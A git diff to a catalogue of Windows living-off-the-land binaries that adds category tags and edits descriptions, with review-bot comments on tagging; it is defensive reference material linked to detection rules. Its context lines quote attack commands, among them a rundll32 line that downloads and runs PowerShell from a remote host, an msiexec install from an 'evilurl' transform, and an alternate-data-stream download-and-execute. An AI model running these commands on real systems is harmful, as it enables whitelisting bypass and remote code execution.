+ - Download: INetCache Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index b6dacef..2e69f24 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DLLUnregisterServer to un-register the target DLL. Usecase: Execute dll files 
@@ -32,6 +34,8 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server @@ -42,8 +46,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index 3caa274..0689edd 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -11,11 +11,11 @@ Commands: Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index abb45d7..7720e70 100644 
--- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.008 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: | odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2" odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project" @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1218.008 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: odbcconf -f file.rsp Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file. Usecase: Execute dll file using technique that can evade defensive counter measures diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index 68b8919..ba48008 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe Detection: diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 9da2358..8a8ee40 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: DLL - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files 
@@ -27,8 +29,6 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
 - Path: C:\Windows\System32\pcalua.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
 Resources:
diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml
index f420282..8a1b221 100644
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@@ -12,12 +12,14 @@ Commands:
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 - Command: Presentationhost.exe https://example.com/payload
- Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+ Description: It will download a remote payload and place it in INetCache.
 Usecase: Downloads payload from remote server
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Windows\System32\Presentationhost.exe
 - Path: C:\Windows\SysWOW64\Presentationhost.exe
diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml
index a007087..cd9f68d 100644
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Type: Compression
 - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
 Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
 Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
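Review bot: The `.CPL` command of Pcalua ends up untagged: the preceding hunk adds `Execute: DLL` to the command above `pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java`, while this hunk shows that CPL command's `OperatingSystem:` line (old line 27) immediately followed by `Full_Path:` with nothing added between them. A `.cpl` is a DLL loaded through its entry point, and this same commit tags the equivalent control.exe entry `Execute: DLL`, so for consistency add `Tags:` / `- Execute: DLL` after the `Windows 11` OperatingSystem line of the CPL command. The CPL command's `Category` and `Privileges` lines fall between the two hunks, so I can't see them.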
@@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression Full_Path: - Path: C:\Windows\System32\spool\tools\PrintBrm.exe Detection: diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index 459d579..5ddc561 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -11,10 +11,10 @@ Commands: Privileges: User, Administrator in Windows 8 MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\rasautou.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml - IOC: rasautou.exe command line containing -d and -p diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index e4cb171..2272b26 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -11,6 +11,9 @@ Commands: Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting 
@@ -18,13 +21,14 @@ Commands: Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index e9c1992..e2f2b62 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 45f7233..f159f04 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting 
@@ -18,11 +21,12 @@ Commands:
 Privileges: Local Admin
 MitreID: T1218.009
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
+ - Input: Custom Format
 Full_Path:
 - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
 - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
 - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml
index d108266..ba5d622 100644
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
 Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
 Usecase: Execute DLL from SMB share.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
 Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
 Usecase: Execute code from Internet
@@ -53,18 +57,20 @@ Commands:
 Privileges: User
 MitreID: T1564.004
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 - Command: rundll32.exe -sta {CLSID}
- Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
+ Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
 Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
 Category: Execute
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Windows\System32\rundll32.exe
 - Path: C:\Windows\SysWOW64\rundll32.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
diff --git a/yml/OSBinaries/Tar.yml b/yml/OSBinaries/Tar.yml
index 6099bfa..5a35631 100644
--- a/yml/OSBinaries/Tar.yml
+++ b/yml/OSBinaries/Tar.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1564.004
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Type: Compression
 - Command: tar -xf compressedfilename:ads
 Description: Decompress a compressed file from an alternate data stream (ADS).
 Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1564.004
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Type: Compression
 - Command: tar -xf \\host1\archive.tar
 Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
 Usecase: Copy files
@@ -25,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Type: Compression
 Full_Path:
 - Path: C:\Windows\System32\tar.exe
 - Path: C:\Windows\SysWOW64\tar.exe
diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml
index 05b47cf..e4b6fdb 100644
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 7, Windows 10, Windows 11
+ Tags:
+ - Execute: WSH
 - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
 Description: Binary file used by .NET to compile Visual Basic code to an executable.
 Usecase: Compile attacker code on system. Bypass defensive counter measures.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 7, Windows 10, Windows 11
+ Tags:
+ - Execute: WSH
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
@@ -28,6 +32,4 @@ Detection:
 - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
 Acknowledgement:
 - Person: Lior Adar
- Handle:
 - Person: Hai Vaknin(Lux)
- Handle:
diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml
index b56b878..d976bff 100644
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
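Review bot: The `Execute: WSH` tag added to both vbc.exe entries (the `@@ -11,6 +11,8 @@` and `@@ -18,6 +20,8 @@` hunks of Vbc.yml) looks mislabelled: the description on the same lines says the binary is the .NET compiler for Visual Basic source, which is compilation rather than Windows Script Host execution. If the tag vocabulary is meant to drive filtering on the site, a compiler-oriented value would describe these entries more accurately than `WSH`; the same question is worth a second look for the `Execute: WSH` tag on wmic.exe in the next hunk, where the surrounding Sigma references speak of XSL script processing. Whatever value is chosen, documenting the allowed `Execute` values in the schema file changed by this commit would make it easier to tag future entries consistently.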
@@ -39,11 +39,11 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: WSH
 Full_Path:
 - Path: C:\Windows\System32\wbem\wmic.exe
 - Path: C:\Windows\SysWOW64\wbem\wmic.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml
index 3371fef..53b5ed3 100644
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1564.004
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: WSH
 - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
 Description: Download and execute script stored in an alternate data stream
 Usecase: Execute hidden code to evade defensive counter measures
@@ -21,8 +23,6 @@ Commands:
 Full_Path:
 - Path: C:\Windows\System32\wscript.exe
 - Path: C:\Windows\SysWOW64\wscript.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml
index 2c57aac..d3fd724 100644
--- a/yml/OSBinaries/Wuauclt.yml
+++ b/yml/OSBinaries/Wuauclt.yml
@@ -5,16 +5,16 @@ Author: 'David Middlehurst'
 Created: 2020-09-23
 Commands:
 - Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer
- Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
+ Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.
 Usecase: Execute dll via attach/detach methods
 Category: Execute
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Windows\System32\wuauclt.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
 - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml
diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml
index c7d36a7..549b609 100644
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@@ -19,12 +19,14 @@ Commands:
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
- Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1].
+ Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
 Usecase: Download file from Internet
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: C:\Windows\System32\xwizard.exe
 - Path: C:\Windows\SysWOW64\xwizard.exe
diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml
index aca788a..b09f76a 100644
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@@ -18,6 +18,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Input: INF
 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
 Description: Launch a DLL payload by calling the RegisterOCX function.
 Usecase: Load a DLL payload.
@@ -25,6 +27,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
 Description: Launch an executable by calling the RegisterOCX function.
 Usecase: Run an executable payload.
diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml
index 5fae88d..5b74564 100644
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@@ -25,6 +25,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
 Description: Launch an executable by calling the RegisterOCX function.
 Usecase: Run an executable payload.
diff --git a/yml/OSLibraries/Scrobj.yml b/yml/OSLibraries/Scrobj.yml
index 5a3ba5c..6b94a49 100644
--- a/yml/OSLibraries/Scrobj.yml
+++ b/yml/OSLibraries/Scrobj.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: c:\windows\system32\scrobj.dll
 - Path: c:\windows\syswow64\scrobj.dll
diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml
index ea6653c..e5b6ccc 100644
--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Input: INF
 - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
 Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
 Usecase: Load an executable payload.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows
+ Tags:
+ - Input: INF
 Full_Path:
 - Path: c:\windows\system32\setupapi.dll
 - Path: c:\windows\syswow64\setupapi.dll
diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml
index 5cb3f90..97e10ab 100644
--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
 Description: Launch an executable by calling the ShellExec_RunDLL function.
 Usecase: Run an executable payload.
diff --git a/yml/OSLibraries/Shimgvw.yml b/yml/OSLibraries/Shimgvw.yml
index acf102f..1f58d66 100644
--- a/yml/OSLibraries/Shimgvw.yml
+++ b/yml/OSLibraries/Shimgvw.yml
@@ -5,12 +5,14 @@ Author: Eral4m
 Created: 2021-01-06
 Commands:
 - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
- Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
+ Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
 Usecase: Download file from remote location.
 Category: Download
 Privileges: User
 MitreID: T1105
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Download: INetCache
 Full_Path:
 - Path: c:\windows\system32\shimgvw.dll
 - Path: c:\windows\syswow64\shimgvw.dll
diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml
index 3911593..ac5cce2 100644
--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Input: INF
 - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
 Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
 Usecase: Load an executable payload.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Input: INF
 Full_Path:
 - Path: c:\windows\system32\syssetup.dll
 - Path: c:\windows\syswow64\syssetup.dll
diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml
index 65cadf0..e107b5e 100644
--- a/yml/OSLibraries/Zipfldr.yml
+++ b/yml/OSLibraries/Zipfldr.yml
@@ -21,8 +21,6 @@ Commands:
 Full_Path:
 - Path: c:\windows\system32\zipfldr.dll
 - Path: c:\windows\syswow64\zipfldr.dll
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
 Resources:
diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml
index 013b575..4298de4 100644
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
 Code_Sample:
diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml
index 8f17285..26109da 100644
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
 Code_Sample:
diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml
index 777d9f7..be527da 100644
--- a/yml/OtherMSBinaries/AccCheckConsole.yml
+++ b/yml/OtherMSBinaries/AccCheckConsole.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
 - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
 Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
 Usecase: Local execution of managed code to bypass AppLocker.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml
index e1c9550..54678db 100644
--- a/yml/OtherMSBinaries/Appvlp.yml
+++ b/yml/OtherMSBinaries/Appvlp.yml
@@ -28,8 +28,6 @@ Commands:
 Full_Path:
 - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
 - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
-Code_Sample:
- - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
 Resources:
diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml
index 1512ea6..9f4e6e6 100644
--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows
+ Tags:
+ - Execute: WSH
